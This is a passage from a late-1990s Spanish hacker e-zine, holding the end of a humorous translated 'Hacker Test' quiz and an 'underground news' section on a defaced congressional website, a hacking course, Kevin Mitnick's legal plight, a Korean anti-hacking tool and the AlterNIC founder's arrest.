  1292.    62. Habia testigos cuando te cargaste el diskette?
  1293.    63. Has conseguido que tu disquetera "ande"?
  1294.    64. Has conseguido que te den un soplo?
  1295.    65. ...Sabes que coño es eso?
  1296.    66. Puedes escuchar musica a traves del cable de tu impresora?
  1297.    67. ..y de la diskettera?
  1298.    68. ..y desde la unidad zip?
  1299.    69. Tienes algun calendario de Snoopy?
  1300.    70. ...al dia?
  1301.    71. Al lado de la impresora tienes la foto de...
  1302.    72. ...Mona Lisa?
  1303.    73. ...El Enterprise?
  1304.    74. ...Einstein?
  1305.    75. ...Oliver Twist?
  1306.    76. ...realmente,alguna vez has impreso algo?
  1307.    77. Sabes para que vale...
  1308.    78. ...DASD?
  1309.    79. ...Emacs?
  1310.    80. ...ITS?
  1311.    81. ...RTST/E?
  1312.    82. ...SNA?
  1313.    83. ...Spool?
  1314.    84. ...TCP/IP
  1315.    85. Has usado alguna vez...TPU?
  1316.    86. ...TECO?
  1317.    87. ...Emacs?
  1318.    88. ...ED?
  1319.    89. ...VI?
  1320.    90. ...Xedit (en VM/CMS)?
  1321.    91. ...SOS?
  1322.    92. ...EDT?
  1323.    93. ...Wordstar?
  1324.    94. Has escrito alguna vez un CLIST?
  1325.    95. Has programado alguna vez en...X Windowing System?
  1326.    96. ...CICS?
  1327.    97. Has recibido alguna vez una fotocopia o fax de un diskette?
  1328.    98. Le has enseñado a algun novato la tecla "cualquiera"?
  1329.    99. ...Era el boton para encender el ordenador?
  1330.    100. Has ido alguna vez a...Useunix?
  1331.    101. ...Decus?
  1332.    102. ...SHARE?
  1333.    103. ...SIGGHAPH?
  1334.    104. ...NetCom?
  1335.    105. Has participado alguna vez en un grupo standard?
  1336.    106. Has hecho alguna vez un debug de datos de un ordenador a traves de
  1337.    tu telefono?
  1338.    107. Has visto alguna vez el voice mail?
  1339.    108. ...Pudiste leerlo?
  1340.    109. Has resuelto algun puzzle con un diccionario on-line?
  1341.    110. Has hecho alguna vez un Hack Test?
  1342.    111. ...lo suspendiste?
  1343.    112. Has tirado alguna vez una baraja al suelo?
  1344.    113. ...La conseguiste ordenar otra vez?
  1345.    114. ...Con los ojos cerrados?
  1346.    115. Has usado alguna vez IPCS?
  1347.    116. Te han dado alguna caja de cerveza cuando compraste tu ordenador?
  1348.    117. Tu ordenador viene con colores de "diseño"?
  1349.    118. Has interrunpido alguna vez un UPS?
  1350.    119. Has apagado alguna vez un servidor?
  1351.    120. ...A proposito?
  1352.    121. ...Sigues trabajando alli?
  1353.    122. Has pulsado alguna vez el boton de emergencia del ordenador?
  1354.    123. ...a proposito?
  1355.    124. Tienes algun tipo de documentacion defectuosa?
  1356.    125. ...y todavia puedes leerla?
  1357.    126. Has descompilado alguna vez un programa?
  1358.    127. ...encontraste algun bug en el?
  1359.    128. Has ayudado a alguna persona detras de un mostrador con su
  1360.    ordenador/terminal?
  1361.    129. Has tratado de atormentar a tu telefono?
  1362.    130. Has tirado algun ordenador por la ventana?
  1363.    131. Has remendado algun bug para que el cliente no se entere de que lo
  1364.    hay?
  1365.    132. Has arreglado alguna vez un problema de hardware mediante software?
  1366.    133. ...y viceversa?
  1367.    134. Perteneciste alguna vez a un grupo ususario/servicio tecnico?
  1368.    135. Te han mencionado alguna vez en una convencion de ordenadores?
  1369.    136. Alguna vez an mencionado tus acciones en el periodico?
  1370.    137. ..sienta bien?
  1371.    138. Has parado alguna vez un disco duro mientras funcionaba?
  1372.    139. Has escrito comentarios en una lengua que no es la tuya?
  1373.    140. Has destruido fisicamente tu equipo mediante software?
  1374.    141. Has intentado mejorar tu puntuacion repitiendo este test?
  1375.    142. Te llevas el diccionario de palabras cuando vas a comer?
  1376.    143. ...y a la cama?
  1377.    144. Has remendado alguna vez un bug de microcodigo?
  1378.    145. ...y alrredepor del bug?
  1379.    146. Saber programar una maquina TURING?
  1380.    147. Puedes convertir un prefijo en sufijo en tu cabeza?
  1381.    148. Puedes convertir hexadecimal en octogonal en tu cabeza?
  1382.    149. Sabes como usar un KLEENEX STAR?
  1383.    150. Te has muerto de hambre cenando con filosofos?
  1384.    151. Conseguiste arreglar el problema?
  1385.    152. ...correctamoente?
  1386.    153. Estando en "punto muerto" has probado a comer spaguetti?
  1387.    154. Escribiste alguna vez un programa autorreproducible?
  1388.    155. Alguna vez cambiaste al "cambiador"?
  1389.    156. Puedes leer un croquis?
  1390.    157. ...necesitas uno?
  1391.    158. Has creado algun virus que se pueda matar?
  1392.    159. ...intencionadamente?
  1393.    160. Te han pedido alguna vez una "galleta"?
  1394.    161. Has acelerado un sistema quitandole un par de jumpers?
  1395.    162. Sabes... quien escribio Rogue?
  1396.    163. ...Rogomatic?
  1397.    164. ...codigo gris?
  1398.    165. ...que significa HCF?
  1399.    166. Lo has usado alguna vez?
  1400.    167. ...intencionadamente?
  1401.    168. Sabes que es una tarjeta de lazo?
  1402.    169. ...has usado alguna vez una?
  1403.    170. Sabes que es el final de una epoca?
  1404.    171. ...has celebrado el final de alguna?
  1405.    172. ...has tenido que reescribir el codigo?
  1406.    173. Sabes cual es la diferencia entre DTE y DCE?
  1407.    174. Sabes a que equivalen los pins de un puerto RS-232C?
  1408.    175. ...puedes enchufarlo sin mirar?
  1409.    176. Tienes.... una copia de Star Wars?
  1410.    177. ...una coleccion de chistes de Lepe?
  1411.    178. ...una copia del diccionario del Hacker?
  1412.    179. ...contribuiste en el diccionario?
  1413.    180. ...La plantilla de un organigrama?
  1414.    181. ...la usas?
  1415.    182. ...tienes tu propio archivo de galletas de la fortuna?
  1416.    183. Tienes el libro de cocina del anarquista?
  1417.    184. ..has cocinado algo de el?
  1418.    185. Tienes un Modem?
  1419.    186. ...una terminal?
  1420.    187. ...un ordenador de juguete?
  1421.    188. ...un PC?
  1422.    189. ...un mainframe?
  1423.    190. ...un superordenador?
  1424.    191. ...un supercubo?
  1425.    192. ...una impresora?
  1426.    193. ...una laser?
  1427.    194. ...una unidad zip?
  1428.    195. ...un periferico, cualquiera?
  1429.    196. ..una relacion estable?
  1430.    197. ...un miniordenador?
  1431.    198. Tienes una calculadora programable?
  1432.    199. ...es RPN?
  1433.    200. Alguna vez tuviste mas de 1 ordenador?
  1434.    201. ...4 ordenadores?
  1435.    202. ...8 ordenadores?
  1436.    203. Tienes una linea de telefono SLIP?
  1437.    204. ...y una TI?
  1438.    205. Tienes una linea de separacion entre tu modem y tu ordenador?
  1439.    206. ...y eso es legal?
  1440.    207. Tienes una memoria salvaje?
  1441.    208. ...de tambor?
  1442.    209. ...de burbujas?
  1443.    210. Usas mas de 16 megas de tu disco duro?
  1444.    211. ...256 megas?
  1445.    212. ...1 gb?
  1446.    213. ...16 gb?
  1447.    214. ...256 gb?
  1448.    215. ...1 terabyte?
  1449.    216. Tienes un disco optico?
  1450.    217. Tienes tu propia unidad zip personalizada?
  1451.    218. ...le has puesto etiqueta?
  1452.    219. Posees mas de 16 floppys?
  1453.    220. ...64?
  1454.    221. ...256?
  1455.    222. ...1024?
  1456.    223. Tienes discos de 8 pulgadas?
  1457.    224. ...y de 16?
  1458.    225. Tienes un reloj interruptor?
  1459.    226. Tienes alguno de los volumenes..."El arte de programar en C?
  1460.    227. ...has hecho todos los ejercicios?
  1461.    228. ...tienes un simulador MIX?
  1462.    229. ...puedes nombrar todos los volumenes que se han escrito?
  1463.    230. Puedes recitar el Quijote?
  1464.    231. ...ayudaste a escribirlo?
  1465.    232. Has participado en el proyecto OS/360?
  1466.    233. Tienes algun libro de bolsillo sobre TTL?
  1467.    234. Tienes documentos impresos de mas de tres años?
  1468.    235. Carreras.... Tienes trabajo?
  1469.    236. ...lo has tenido alguna vez?
  1470.    237. ...relacionado con ordenadores?
  1471.    238. Trabajas con un horario "raro"?
  1472.    239. Fuiste alguna vez administrador de sistema?
  1473.    240. Tienes mas megabytes que megapelas?
  1474.    241. Has degradado alguna vez tu trabajo para optimizar tu procesamiento?
  1475.    242. Tienes un trabajo seguro?
  1476.    243. ...puedes probarlo?
  1477.    244. Alguna vez has tenido alguna oferta de seguridad informatica?
  1478.    245. Juegos.... Has jugado alguna vez al Pong?
  1479.    246. ...Space War?
  1480.    247. ...Star Trek?
  1481.    248. ...Whipeout?
  1482.    249. ...Warcraft?
  1483.    250. ...Empire?
  1484.  
  1485.    Bueno, de momento aqui esta la mayoria del Hacker Test, si tienes algun
  1486.    problema con el test, escribenos y hablaremos sobre ello, que aparte de
  1487.    Hackers tambien tenemos algo de psicologos.
  1488.  
  1489.    Tambien espero que os haya gustado, es un poco jodido traducirlo y que
  1490.    tenga gracia tambien, pero bueno, se hace lo que se puede.
  1491.  
  1492.    Hala hasta otra... 
  1493.  
  1494.                                                       Mac_Crack Bishop
  1495.                                                   - J.J.F. / HACKERS TEAM -
  1496.  
  1497.                                                     mac_crack@hotmail.com
  1498.  
  1499. ------------------------------------------------------------------------------
  1500. ██████████████████████████████████████████████████████████████████████████████
  1501. ------------------------------------------------------------------------------
  1502.  
  1503.                           ------------------------
  1504.                           - NOTICIAS UNDERGROUND -
  1505.                           ------------------------
  1506.                                            by   CONDE VAMPIRO
  1507.                                            - J.J.F. / HACKERS TEAM -
  1508.  
  1509. ──────────────────────────────────────────────────────────────────────────────
  1510.  WEB DEL CONGRESO HACKEADA.
  1511.  
  1512.         A principios de Noviembre el web del congreso español fue hackeada
  1513.  presuntamente por el grupo !H (no sera yo quien diga lo que significa :).
  1514.  Cuando conectas al web, aparecia una pantalla oscura con un grafico
  1515.  en el cual se veia un gran !H.
  1516.  Y debajo ponia la siguiente frase:
  1517.  "HAPPY HACKLOWEEN" y con otra que decia mas o menos "Señores del congreso,
  1518.  poner un web no es solo enchufar el ordenador.(!H)"
  1519.  
  1520.  -> http://www.congreso.es
  1521.  
  1522.  Nota: no me acuerdo exactamente de la frase, por eso si alguien se la sabe
  1523.  correctamente que me la envie para rectificar. thx.
  1524.  Al igual que cuando salga este e-zine el web del congreso ya estara
  1525.  arreglada.
  1526.  
  1527. ──────────────────────────────────────────────────────────────────────────────
  1528.  CLASES DE HACKING EN LA UNIVERSIDAD.
  1529.  
  1530.         Un Profesor de la Universidad de Salve Regina en Newport en los EE.UU.
  1531.  ha introducido una nueva asignatura llamana Computer Hacking 101.
  1532.         Nicholas Lund-Molfese ha enseñado a muchos agentes de la policia como
  1533.  crackear password y construir y manejar Van Eck Devices, pequeñas
  1534.  herramientas para monotorizar las frecuencias de los ordenadores.
  1535.  Un profesor de la Administracion Universitaria del departamento de
  1536.  Criminologia, Lund-Molfese esta enseñando como romper la ley mediante los
  1537.  ordenadores. Pero tambien busca impartir en los estudiantes algunos
  1538.  conceptos basicos de la naturaleza humana. Y esto es: La gente no cambia --
  1539.  Lo que si es la tecnologia que ellos usan para cometer crimenes, dice Lund-
  1540.  Molfese.
  1541.         "Muchos delitos informaticos son fraudulentos, son falsos , y son
  1542.  solamente accidentes tecnologicos," dice Lund-Molfese, un abogado quien
  1543.  tambien mantiene un grado de filosofia.
  1544.         La primera materia impartida en el curso, llamada Cultura, Ordenadores
  1545.  y Leyes, es difundir la tecnologia entre las masas para que no tengan miedo
  1546.  de ella, afirma Lund-Molfese. "Un oficial de policia  que esta investigando
  1547.  un caso no puede mirar en un ordenador ligeremante y apagarlo". Entrar en un
  1548.  ordenador con los arcaicos comandos del DOS es una de las materias
  1549.  impartidas en cinco semanas, las cuales terminan el proximo mes.
  1550.         La clase requeire textos como "Secrets of a Super Hacker" por
  1551.  The Knightmare y "Information Warfare" por Winn Schwartau, un formidable
  1552.  libro clasificado usado en asignaturas gubernamentales, la unica materia
  1553.  permitida que Lund-Molfses pudo encontrar en una busqueda de curriculum.
  1554.         Al final del curso los alunos deben hacer un proyecto para aprobar.
  1555.  Uno de los posibles proyectos es demostrar como recuprar datos borrados o
  1556.  dañados de un disco. Otra de las posibilidades es construir un Van Eck
  1557.  Device, romper criptografia debil o encontrar virus flotando por internet
  1558.  y diseñar un antivirus para ellos.
  1559.  
  1560. ──────────────────────────────────────────────────────────────────────────────
  1561.  UN CONOCIDO HACKER SOLICITA AYUDA LEGAL.
  1562.  
  1563.         El Sr. Kevin Mitnick ha sido retenido bajo custodia federal
  1564.  alegando delitos informaticos por mas de 30 meses. No teniendo recursos
  1565.  financieros, el Sr. Mitnick ha sido manipulado por la Defensa Federal. Al
  1566.  igual, el abogado de Mitnick no puede asistir a la sala del tribunal con
  1567.  actos civiles, como con una carta Habeas Corpus.
  1568.         El los 2 ultimos años Mitnick se ha visto obligado para su propia
  1569.  defensa a buscar informacion legal en la seccion de leyes de el Metropolitan
  1570.  Detention Center (MDC) en los Angeles, California.
  1571.         La busqueda de Mitnick incluye casos parecidos al suyo para argumentar
  1572.  una mejor defensa. Los oficiles de la prision MDC han estado todo el rato
  1573.  entorpeziendo los esfuerzos de Mitnick negandole acceso a la libreria. A
  1574.  principios de este año, el abogado de Mintick a enviado un recurso legal a
  1575.  el Sr. Wayne Siefert, el director del MDC, solicitando para su cliente
  1576.  acceso a la libreria ya que necesita pasar mas tiempo. El director se nego.
  1577.          En agosto de 1995, Mitnick relleno un formulario administrativo con
  1578.  el Bureau of Prisons justificando que la policia del MDC en contacto con el 
  1579.  acceso al material juridico no esta siguiendo las leyes y regulaciones
  1580.  Federales. Especialmente, el Director ha establecido una politica en la cual
  1581.  el MDC detracta de la politica del Bureau of Prison's estableciado en el
  1582.  codigo de las Regulaciones Federales.
  1583.         Finalmente, las leyes Federales han obligado al Director del MDC ha
  1584.  ampliar el horario de abertura de la libreria juridica alegando que en breve
  1585.  acabara el caso en los juzgados. La politica del MDC declara un error al
  1586.  interpretar el acta que se le fue enviado por incluir otros factores.
  1587.          Por ejemplo, la politica del MDC no considera la detencion,
  1588.  motivacion, estatus, conferencia or cualquier cosa similar como inmimente
  1589.  finalizacion del caso. Los oficiales del MDC usan su politica como una
  1590.  herramienta para conseguir sus propositos. En su apariencia la politca del
  1591.  MDC en contacto con las actividades legales es inedecuada con las leyes
  1592.  Federales y por eso afecta sustancialmente a los derechos de los detenidos
  1593.  que envuelve sustancialmente los intereses de la libertad.
  1594.         En Junio de 1997, Mitnick finalmente obtubo remedios administrativos
  1595.  del Bureau of Prisons. La unica peticion del Sr. Mitnick es obtener
  1596.  fundamentos juridicos en el juzgado. A Mitnick le gustaria relleñar un
  1597.  Writ of Habeas Corpus alegando su condicion de detenido, y una protesta
  1598.  contra las autorirades Federales las cuales siguen sus propias reglas y
  1599.  regulaciones.
  1600.         El Sr. Mitnick espera encontrar a una persona la cual tenga
  1601.  experiencia en estos casos, como tambien un abogado o un estudiante de
  1602.  derecho el cual le ceda un poco de su tiempo para asegurar que se cumpla la
  1603.  ley, y para determinar las interferencias gubernamentales en la defensa.
  1604.          Mitnick necesita ayuda para dibujar una peticion Habeas Corpus con
  1605.  los puntos para ser sometido por el mismo. Sus objetivos son conseguir
  1606.  razonablemente el acceso a la libreria para su propia defensa.
  1607.          Si quieres ayudar a Kevin, por favor contacta con el en la siguiente
  1608.  dirrecion:
  1609.  Mr. Kevin Mitnick
  1610.  Reg. No. 89950-012
  1611.  P.O. Box 1500
  1612.  Los Angeles, CA 90053-1500 
  1613.  
  1614. ────────────────────────────────────────────────────────────────────────────── 
  1615.  COREA DEL SUR ES EL PRIMER PAIS DE DESARROLLA UN PROGRAMA ANTI-HACKING.
  1616.  
  1617.          Seul, agosto 27, Xinhua - la Agencia de Informacion de Seguridad de
  1618.  Corea del Sur (KISA) ha desarrollado 2 productos de software anti-hacking,
  1619.  posiblemente el primer programa para perseguir hackers en el mundo.
  1620.         Online SecuDr es un programa diseñado para diagnostigar las
  1621.  debilidades de un sistema informatico, mientras que SecuLog impide la
  1622.  eliminacion o alterar las entradas ilegales a un sistema, Goh Seung-cheol,
  1623.  un cientifico senior de la KISA, salio diciendo en un periodico local. 
  1624.         Usando Online SecuDr, Kisa ha empezado un servicio gratis de
  1625.  diagnostico. Los Administradores que deseen chekear su sistema pueden
  1626.  acceder a este servico dirigiendose al web oficial de la agencia, el cual
  1627.  esta es Korea rellenando los siguientes datos: nombre del Host, url y
  1628.  sistema operativo.
  1629.          Con la informacion, Online SecuDr automaticamente revisara el
  1630.  sistema, determinando su estado y enviando un diagnostico al administrador
  1631.  del sistema via e-mail, dice Goh, admitiendo de que el servicio sera muy
  1632.  efectivo evitando hacking.
  1633.         El dice que SecuLog, es un programa que tracea a los hackers,
  1634.  automaticamente recogera los ficheros log en los cuales los hackers
  1635.  manipulan o borran para eliminar su entrada al sistema.
  1636.          Un fichero log graba todas las conexiones al sistema. Normalmente
  1637.  los Administradores esconden alrededor de 200 copias de ficheros log en sus
  1638.  propias computadoras, haciendo mas dificil a los hackers destrozar estos
  1639.  ficheros totalmente.
  1640.         "Normalmente para un hacker borrar las 200 copias escondidas le
  1641.  supone un tiempo considerable. SecuLog impide que los hackers borrer los
  1642.  ficheros log. Si un hacker falla al borrar las 200 copias antes de que
  1643.  Seculog recoga alguna, habra dejado evidencias de su entrada al sistema"
  1644.  dice Goh.
  1645.         El dice que desde que SecuLog es el primer programa traceador de
  1646.  hackers en el mundo, ellos planean regristar domesticamente e
  1647.  internacionalmente las patentes del programa y tambien transpasar esta
  1648.  tecnologia a empresas privadas dedicadas al desarrollo para su
  1649.  comercializacion.
  1650.         Hasta que el producto salga comercialmente, la agencia planea proveer
  1651.  el programa para aquellos que lo soliciten, que esta disponible en Koreano y
  1652.  en ingles.
  1653.         Goh tambien añade que su grupo comenzara a mejorar el programa como
  1654.  se espera que los hackers encuentran formas de esquivarlo alrededor de 2
  1655.  años.
  1656.  
  1657.  http://www.kisa.or.kr
  1658.  
  1659. ────────────────────────────────────────────────────────────────────────────── 
  1660.  DETENIDO EL FUNDADOR DE ALTERNIC.
  1661.  
  1662.  3-11-1997. 
  1663.          Un oficial del FBI a confirmado hoy mismo que el fundador de
  1664.  AlterNIC Eugene Kashpureff a sido arestado el viernes en Toronto, EE.UU.,
  1665.  por fraude.
  1666.         En Julio, Kashpureff havia manipulado el url de Internic, enviando
  1667.  surfers intentando conseguir el "www.internic.net" para su propio servidor
  1668.  "www.alternic.net" alegando protesta.
  1669.          Inmediatamente, el sabia que podia ser detinido por delito
  1670.  informatico en las leyes Federales, dice el.
  1671.          Las autoridades detuvieron a Kashpureff despues de unas semanas de
  1672.  investigacion, dice Joe Valiquette, un portavoz del FBI en Nueva York. Marc
  1673.  Hurst, el portavoz de AlterNIC, dice que Kashpureff esta esperando ser
  1674.  deportado.
  1675.          Hurst dice que el fue contactado hace unas semanas por el
  1676.  Departamento de Imigracion Canadiense quien buscaba a Kashpureff porque el
  1677.  estaba perseguido por el FBI por varios delitos de fraude.
  1678.          Network Solutions (NSI), que se encarga del resgristro de InterNIC
  1679.  que por el cual Kashpureff estaba protestando, ha decido llevar a jucio a
  1680.  Kashpureff, pero el caso fue detenido.
  1681.          Kashpureff se disculpa ante la comunidad Internet e intenta ayudar
  1682.  informando sobre como arreglar el programa que previene que alquien se
  1683.  apodere de un dominio llamado hijacking.
  1684.          Pero probablemente su problema no termino en Agosto con el veredicto
  1685.  del Jurado. Llevando a Kashpureff al juzgado civil, Network Solutions ha
  1686.  contactado con los oficiles de la justicia quienes invistigaban el caso de
  1687.  Kashpureff por varios delitos informaticos.
  1688.          Un portavoz dice que Network Solutions por el momento no planeaba
  1689.  denunciar a Kashpureff. Kashpureff originalmente empezo a manipular web's el
  1690.  11 de Julio y paro el 14 de Julio, pero se enfurecio y volvio otra vez el 18.
  1691.  Y por esto los oficiales de Network Solutuions decidieron llevarle a jucio,
  1692.  dice un oficial.
  1693.          "Kashpureff estaba atacando la red", escribio en su mail un oficial
  1694.  de Network Solutions. "El directamente alteraba el cache de los servidores
  1695.  locales en los cuales no havian instalado una version superior del BIND".
  1696.          BIND es un programa que controla el Internet's Domain Name System
  1697.  protocol (DNS). Los avisos de seguridad han sido muy numerosos alertando a
  1698.  los administradores que instalen la ultima version del BIND.
  1699.          Hurst dice hoy que el no condena ningun crimen que Kashpureff
  1700.  pudiese haver cometido, ademas el estaba sorprendido con la venebolencia en
  1701.  la cual el dijo estaba siendo tratado Kashpureff. Hurst dijo que el fue
  1702.  contactado hace unas semanas por el Departamento de Imigracion en busqueda
  1703.  de Kashpureff.
  1704.         Cuando kashpureff, el padre de cuatro, perpreto el hack, el dice que
  1705.  estaba enfadado y no havia pensado en las ramificaciones. Algunos en la
  1706.  comunidad de Internet han aplaudido sus actos, alegando que ellos
  1707.  necesitaban enseñar el monopolio que Networks Solutions ejercia en los DNS.
  1708.  Otros han criticado a Kashpureff, diciendo que sus actos son malvados,
  1709.  causan daños y se merecen un castigo.
  1710.          Hurst y Richard Sexton ambos afirman, que quien ayudase a Kashpureff
  1711.  en AlterNIC, diciendo que aunque eran contrarios a Kashpureff quieren
  1712.  encontrar lo que demuestre su inocencia.
  1713.          "Lo que mas se puede haver perdido son 2 segundos y un click de
  1714.  raton" dice Sexton. "Esto es fraude, pero el damaño real es minimo. El
  1715.  deberia ser declarado culpable y con una multa de un dolar".
  1716.         "Estoy sorprendido con la seriedad que se le trata," dice Hurst.
  1717.  "El es un informatico. No un cracker. El no ha causado daños en ningun
  1718.  aeropuerto. El tampoco a casado problemas a los hospitales. EL solo
  1719.  redigirio algunos web's"
  1720.  
  1721. ------------------------------------------------------------------------------
  1722. ██████████████████████████████████████████████████████████████████████████████
  1723. ------------------------------------------------------------------------------
  1724.  
  1725.    Pues esto ha sido todo y esperamos que te haya gustado.
  1726.    Como ya he dicho en la editorial para enviar articulos (cosa que
  1727.    necesitamos sobre H/C/P/V) o cualquier cosa que nos quieras decir,
  1728.    escribe a:
  1729.  
  1730.    jjf_team@hotmail.com
  1731.  
  1732.                            HASTA EL PROXIMO NUMERO
  1733.                           - J.J.F. / HACKERS TEAM -
  1734.  
  1735.                      FELIZ NAVIDAZ & FELIZ HACK , JO JO JO !!!
  1736.  
  1737. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1738.